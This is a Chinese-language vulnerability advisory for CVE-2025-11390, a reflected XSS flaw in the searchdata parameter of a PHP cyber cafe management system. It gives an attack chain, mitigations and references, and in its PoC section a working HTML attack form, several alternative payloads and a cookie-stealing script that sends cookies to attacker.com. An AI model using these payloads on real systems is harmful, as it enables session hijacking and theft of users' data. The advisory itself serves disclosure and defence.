CVE-2025-11390：PHPGurukul Cyber Cafe管理系统search.php跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-11390

漏洞类型

跨站脚本攻击（XSS）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

PHPGurukul Cyber Cafe Management System

漏洞概述

CVE-2025-11390是PHPGurukul Cyber Cafe Management System 1.0版本中存在的反射型跨站脚本（Reflected XSS）漏洞。该漏洞位于Web应用程序的/search.php文件中，具体涉及POST参数处理器对searchdata参数的处理逻辑存在缺陷。攻击者可以通过构造恶意的JavaScript代码作为searchdata参数的值发送到目标服务器，当受害者在浏览器中查看包含恶意脚本的链接或提交包含恶意代码的表单时，恶意脚本将在受害者的浏览器上下文中执行。

该漏洞的CVSS 3.1评分为4.3分，属于中等严重等级。攻击者无需任何身份认证即可远程发起攻击，但需要用户进行交互（如点击恶意链接或访问恶意页面）。一旦漏洞被利用，攻击者可以在受害者的浏览器中执行任意JavaScript代码，可能导致会话劫持、敏感信息窃取、钓鱼攻击或恶意操作等安全问题。值得注意的是，该漏洞的利用代码已经公开披露，这大大增加了其被恶意利用的风险。

PHPGurukul Cyber Cafe Management System是一个用于管理网吧（Cyber Cafe）运营的开源Web应用程序，提供用户管理、计费、计时等功能。由于该系统通常部署在面向公众的网络环境中，且涉及用户敏感信息，因此XSS漏洞可能对系统用户构成实质性威胁。

技术细节

该漏洞属于典型的反射型跨站脚本（Reflected XSS）漏洞，其根本原因在于/search.php文件中的POST参数处理器未对用户输入的searchdata参数进行充分的过滤和转义处理。

在正常情况下，searchdata参数用于接收用户输入的搜索关键词，服务器端会将该值回显到HTML页面中。然而，由于缺乏对特殊字符（如<、>、"、'、&等HTML元字符）的适当转义处理，攻击者可以在searchdata参数中注入恶意的JavaScript代码。当服务器将该参数值嵌入到返回的HTML响应中时，恶意脚本将被浏览器解析并执行。

利用方式如下：
1. 攻击者构造一个包含恶意JavaScript代码的POST请求，目标URL为/search.php；
2. 在请求体中，searchdata参数被设置为类似"<script>alert(document.cookie)</script>"或更复杂的payload；
3. 攻击者通过社会工程学手段（如钓鱼邮件、即时消息等）诱导受害者点击或提交该恶意请求；
4. 服务器接收请求后，将未转义的searchdata值直接嵌入HTML响应中返回给浏览器；
5. 受害者的浏览器解析响应内容，执行嵌入的恶意JavaScript代码；
6. 恶意代码在受害者的会话上下文中运行，可以窃取Cookie、会话令牌，或执行其他恶意操作。

由于该漏洞需要用户交互（UI:R），攻击者需要欺骗用户主动触发漏洞，这使得攻击的成功率取决于社会工程学的有效性。

攻击链分析

STEP 1

步骤1：漏洞侦察

攻击者通过信息收集发现目标系统运行PHPGurukul Cyber Cafe Management System 1.0，并定位到/search.php文件存在XSS漏洞。

STEP 2

步骤2：构造恶意Payload

攻击者构造包含恶意JavaScript代码的POST请求，将恶意脚本嵌入到searchdata参数中。

STEP 3

步骤3：社会工程诱导

攻击者通过钓鱼邮件、即时消息或伪造网页等方式诱导受害者点击恶意链接或提交恶意表单。

STEP 4

步骤4：触发漏洞

受害者在浏览器中提交包含恶意payload的请求，服务器将未转义的用户输入直接返回到HTML响应中。

STEP 5

步骤5：恶意代码执行

浏览器解析响应内容并执行嵌入的恶意JavaScript代码，攻击者在受害者会话上下文中获得执行权限。

STEP 6

步骤6：信息窃取或进一步攻击

攻击者利用执行的恶意代码窃取用户Cookie、会话令牌，或进行钓鱼攻击、重定向到恶意网站等进一步攻击行为。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-11390 PoC: Reflected XSS in PHPGurukul Cyber Cafe Management System 1.0 -->
<!-- Affected file: /search.php -->
<!-- Vulnerable parameter: searchdata (POST) -->

<!DOCTYPE html>
<html>
<head>
    <title>CVE-2025-11390 PoC</title>
</head>
<body>
    <h1>CVE-2025-11390 - Reflected XSS PoC</h1>
    <form action="http://target.com/search.php" method="POST" id="xssForm">
        <input type="hidden" name="searchdata" value='"><script>alert(document.cookie)</script>' />
        <input type="submit" value="Click to trigger XSS" />
    </form>
    <script>
        // Auto-submit option for demonstration
        // document.getElementById('xssForm').submit();
    </script>
</body>
</html>

<!-- 
Alternative payloads for the searchdata parameter:
1. Basic alert: <script>alert('XSS')</script>
2. Cookie stealing: <script>document.location='http://attacker.com/steal?c='+document.cookie</script>
3. Event-based: " onmouseover="alert('XSS')
4. Image-based: <img src=x onerror=alert('XSS')>
5. SVG-based: <svg onload=alert('XSS')>

Usage:
- Replace 'http://target.com' with the actual target URL
- Host this HTML on an attacker-controlled server
- Trick victim into clicking the submit button or visiting the page
-->

影响范围

PHPGurukul Cyber Cafe Management System 1.0

防御指南

临时缓解措施

在等待官方修复补丁发布之前，建议采取以下临时缓解措施：1）部署Web应用防火墙（WAF）规则，过滤searchdata参数中的可疑XSS payload；2）在Web服务器层面配置输入过滤规则，限制POST请求中searchdata参数的特殊字符；3）启用Content Security Policy（CSP）头部，限制内联脚本执行；4）为所有会话Cookie设置HTTPOnly属性，降低Cookie被窃取的风险；5）对用户进行安全意识培训，警惕可疑链接和表单提交请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11390
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11390
3 Details https://www.cvedetails.com/cve/CVE-2025-11390/
4 VulDB https://vuldb.com/cve/CVE-2025-11390
5 Link https://github.com/QIU-DIE/CVE/issues/4
6 Link https://phpgurukul.com/
7 Link https://vuldb.com/?ctiid.327317
8 Link https://vuldb.com/?id.327317
9 Link https://vuldb.com/?submit.664984
10 Link https://vuldb.com/?submit.665028